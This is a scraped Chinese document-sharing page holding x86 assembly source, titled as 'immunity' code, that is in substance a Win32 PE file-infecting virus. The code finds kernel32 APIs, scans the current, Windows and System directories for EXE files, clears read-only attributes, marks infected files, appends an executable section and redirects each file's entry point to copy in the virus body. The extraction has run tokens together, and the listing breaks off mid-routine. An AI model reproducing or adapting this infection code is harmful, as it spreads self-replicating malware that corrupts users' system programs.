immunity代码柴婷婷文档格式.docx

immunity代码柴婷婷文档格式.docx

《immunity代码柴婷婷文档格式.docx》由会员分享，可在线阅读，更多相关《immunity代码柴婷婷文档格式.docx（25页珍藏版）》请在冰豆网上搜索。

nstart:

popebp

subebp,offsetnstart

病毒中常用的一种方法。

得到一个偏移差。

程序后面用到的所有变量都需要加上个这偏移差

assumefs:

nothing;

设置SEH,发生异常可以直接返回原入口.

leaebx,SEH[ebp]

pushebx

pushfs:

[0]

movfs:

[0],esp

movOldEsp[ebp],esp

=========================

*更改程序入口地址*

cmpold_base[ebp],0

jnzgonext

movold_base[ebp],400000h

gonext:

cmpold_in[ebp],0

jnzchange

movold_in[ebp],1000h

change:

moveax,old_base[ebp]

movdes_base[ebp],eax

moveax,old_in[ebp]

movdes_in[ebp],eax

变量定义的的意思见后方

程序开始执行时，当前程序的原入口地址会放到old_base+old_in中

由于程序中old_base_in有别的用途，因此将此地址存放到

des_base_in，以便最后跳回原程序入口。

获得KERNEL32地址及所需的API函数地址

moveax,[esp+10h];

//取Kernel32返回地址

andax,0f000h

movesi,eax;

//得到Kernel.PELoader代码位置（不精确）

LoopFindKernel32:

subesi,1000h

cmpwordptr[esi],'

ZM'

;

//搜索EXE文件头

jnzshortLoopFindKernel32

GetPeHeader:

movzxedi,wordptr[esi+3ch]

addedi,esi

cmpwordptr[edi],'

EP'

//确认是否PE文件头

jnzshortLoopFindKernel32;

esi->

kernel32,edi->

kernel32PEHEADER

//////////////////////////////////////////////////查找GetProcAddress函数地址

movvKernel32[ebp],esi

GetPeExportTable:

movebx,[edi+78h];

4+14h+60h

addebx,vKernel32[ebp];

//得到输出函数表

movvExportKernel[ebp],ebx

push14

callaGetProcAddr

db"

GetProcAddress"

aGetProcAddr:

leaeax,GetApiAddress[ebp]

calleax

oreax,eax

jzExitTimes

movvGetProcAddress[ebp],eax;

得到GetProcAddress地址

leaesi,bGetModuleHandle[ebp];

获得所有用到的KERNEL32函数的地址

leaedi,vGetModuleHandle[ebp]

cld

ComeOn:

lodsd

addeax,ebp

pusheax

pushvKernel32[ebp]

calldwordptrvGetProcAddress[ebp]

stosd

cmpdwordptr[esi],0

jnzComeOn

callUserDll1

db"

User32.dll"

UserDll1:

calldwordptrvGetModuleHandle[ebp]

oreax,eax

jnzRight

callUserDll2

UserDll2:

calldwordptrvLoadLibrary[ebp]

jzExitTimes;

获得USER32.DLL地址

Right:

callGetMess

MessageBoxA"

GetMess:

pusheax

calldwordptrvGetProcAddress[ebp]

jzExitTimes

movvMessageBox[ebp],eax;

获得MESSAGEBOX地址

-------------------------

目录的开头部份

leaeax,NowPath[ebp]

moveax,256

callvGetCurrentDirectory[ebp];

成功返回写入字节数,失败返回0

testeax,eax

通过API函数得到当前程序所在目录

leaeax,SrcDir[ebp]

callvlstrcpy[ebp]

保存当前目录

movNowPathNo[ebp],1

FindStartT:

cmpNowPathNo[ebp],1

jzGFindFt

cmpNowPathNo[ebp],2

jzGetWinD

cmpNowPathNo[ebp],3

jzGetSysD

jmpAllFindEnd

根据NowPathNor值来判断感染哪个目录的文件

GetWinD:

callvGetWindowsDirectory[ebp]

callvSetCurrentDirectory[ebp]

jmpGFindFt

得到WINDOWS所在目录，并且将其设为当前目录

GetSysD:

callvGetSystemDirectory[ebp]

得到SYSTEM所在目录，并且将其设为当前目录

GFindFt:

leaeax,FindData[ebp]

leaeax,FileFilter[ebp]

callvFindFirstFile[ebp]

cmpeax,INVALID_HANDLE_VALUE

jzFindEnds

movhFind[ebp],eax

查找当前目录下的第一个EXE文件

GoOnFind:

获得文件的属性,确保文件可以被打开

leaeax,FindData[ebp].cFileName

callvGetFileAttributes[ebp]

cmpeax,-1

jzEndDir

movOldAttribute[ebp],eax

testeax,1

jzOpen

andeax,0fffffffeh

callvSetFileAttributes[ebp]

Open:

以下是病毒传染部份

push0

pushFILE_ATTRIBUTE_NORMAL

pushOPEN_EXISTING

pushFILE_SHARE_READ+FILE_SHARE_WRITE

pushGENERIC_READ+GENERIC_WRITE

callvCreateFile[ebp]

movhFile[ebp],eax

打开文件

leaeax,LastWriteTime[ebp]

leaeax,LastAccessTime[ebp]

leaeax,CreationTime[ebp]

pushhFile[ebp]

callvGetFileTime[ebp]

jzCloseFile1

保存原来文件修改时间

push0

pushPAGE_READWRITE

pushNULL

pushhFile[ebp]

callvCreateFileMapping[ebp]

jzCloseFile

movhMapping[ebp],eax

pushFILE_MAP_READ+FILE_MAP_WRITE

pushhMapping[ebp]

callvMapViewOfFile[ebp]

jzCloseMap

movpMapping[ebp],eax

判断感染条件:

1,是否PE.2:

是否已感染.3:

是否有足够的空间.4:

WINZIP自解压文件

movebx,eax

assumeebx:

ptrIMAGE_DOS_HEADER

moveax,[ebx].e_lfanew

testeax,0fffff000h

jnzEndDir;

Header+stub不可能太大,超过4096byte

movpe_header_off[ebp],eax

addebx,eax;

此时ebx指向PE文件头

assumeebx:

ptrIMAGE_NT_HEADERS

cmp[ebx].Signature,IMAGE_NT_SIGNATURE;

是PE文件吗？

jnzUnMap

cmpwordptr[ebx+1ah],'

FB'

是否已经感染

jzUnMap

***************************************************************

指向第二个节判断是否是WinZip自解压文件

是就不感染

***************************************************************

moveax,ebx

addeax,18h;

PEHEADER（4）+FILEHEADER（14）

movzxesi,[ebx].FileHeader.SizeOfOptionalHeader

addeax,esi;

eax指向第1个节表

assumeeax:

ptrIMAGE_SECTION_HEADER

movedx,[eax].PointerToRawData

addedx,ebx

subedx,pe_header_off[ebp]

subedx,4

cmpdwordptr[edx],0

jnzUnMap

addeax,28h;

eax指向第2个节表

movedx,eax

assumeedx:

moveax,[edx].PointerToRawData

addeax,ebx

subeax,pe_header_off[ebp]

addeax,12h;

加10h+2h（10h处为"

WinZip...."

）

cmpdwordptr[eax],'

piZn'

push[ebx].OptionalHeader.FileAlignment

popFileAlign[ebp]

判断是否有足够空间存储新节

28h=sizeofIMAGE_SECTION_HEADER,18h=sizeofIMAGE_FILE_HEADER

edi将指向新节

movzxeax,[ebx].FileHeader.NumberOfSections;

文件的节数

movecx,28h

mulecx

addeax,pe_header_off[ebp]

addeax,18h

addeax,esi

movNewSection_off[ebp],eax;

保存新节起始RVA

比较增加新节后是否超出SizeOfHeaders（节.TEXT在文件中的RVA）

cmpeax,[ebx].OptionalHeader.SizeOfHeaders

jaInfest;

即使没有添加空间还是可以免疫

pushpMapping[ebp];

关闭映射文件,然后从新生成新的映射文件

callvUnMapViewOfFile[ebp];

并将映射文件的空间增加4K以便加入病毒代码

callvCloseHandle[ebp]

callvGetFileSize[ebp];

getfilesize

movecx,FileAlign[ebp]

xoredx,edx

divecx

testedx,edx

jzNoChange

inceax

NoChange:

movfsize[ebp],eax;

文件尺寸节文件对齐

addeax,1000h

pusheax

movebx,eax

addebx,pe_header_off[ebp];

ptrIMAGE_NT_HEADERS

Noinfect:

保存原入口

moveax,[ebx].OptionalHeader.AddressOfEntryPoint

movold_in[ebp],eax

moveax,[ebx].OptionalHeader.ImageBase

movold_base[ebp],eax

movedi,NewSection_off[ebp];

新节的RVA

addedi,pMapping[ebp];

edi->

新节起始地址

*********************************************************************

空间允许,^0^,开始插入新节并填充各字段

esi指向原文件最后一个节，利用它来填充新节某些字段

*********************************************************************

inc[ebx].FileHeader.NumberOfSections;

节数目+1

movesi,edi;

edi指向新节

subesi,28h;

esi指向上一个节

assumeedi:

ptrIMAGE_SECTION_HEADER

assumeesi:

mov[edi].Name1,41h;

随便为新节命名，使之不等于0

push[ebx].OptionalHeader.SizeOfImage;

原文件映像装入内存后的总尺寸,对齐SectionAlignment.

pop[edi].VirtualAddress;

新节在内存中的地址

moveax,offsetvend-offsetvstart

mov[edi].Misc.VirtualSize,eax;

新节的大小（未对齐）

movecx,[ebx].OptionalHeader.FileAlignment

jzNoChange1

NoChange1:

mulecx

mov[edi].SizeOfRawData,eax;

新节对齐FileAligment后的大小

moveax,fsize[ebp]

mov[edi].PointerToRawData,eax;

本节在文件中的位置

mov[edi].Characteristics,0E0000020h;

可读可写可执行

*****************************************************************************************

更新SizeOfImage,AddressOfEntryPoint,使新节可以正确加载并首先执行

*****************************************************************************************

moveax,[edi].Misc.VirtualSize;

movecx,[ebx].OptionalHeader.SectionAlignment;

内存节对齐

jzNoChange2

NoChange2:

addeax,[ebx].OptionalHeader.SizeOfImage;

对齐后大小+原文件映像装入内存后的总尺寸,对齐SectionAlignment.

mov[ebx].OptionalHeader.SizeOfImage,eax;

更新后的文件映像装入内存后的总尺寸,对齐SectionAlignment.

moveax,[edi].VirtualAddress;

新节在内存中的地址写入入口点

mov[ebx].OptionalHeader.AddressOfEntryPoint,eax

movwordptr[ebx+1ah],'

写入感染标志

movedi,pMapping[ebp]

addedi,fsize[ebp]

leaesi,vstart[ebp]

movecx,offsetvend-offsetvstart

cld

repmovsb;

将病毒代码写入映射的内存中（在原文件之后）

***********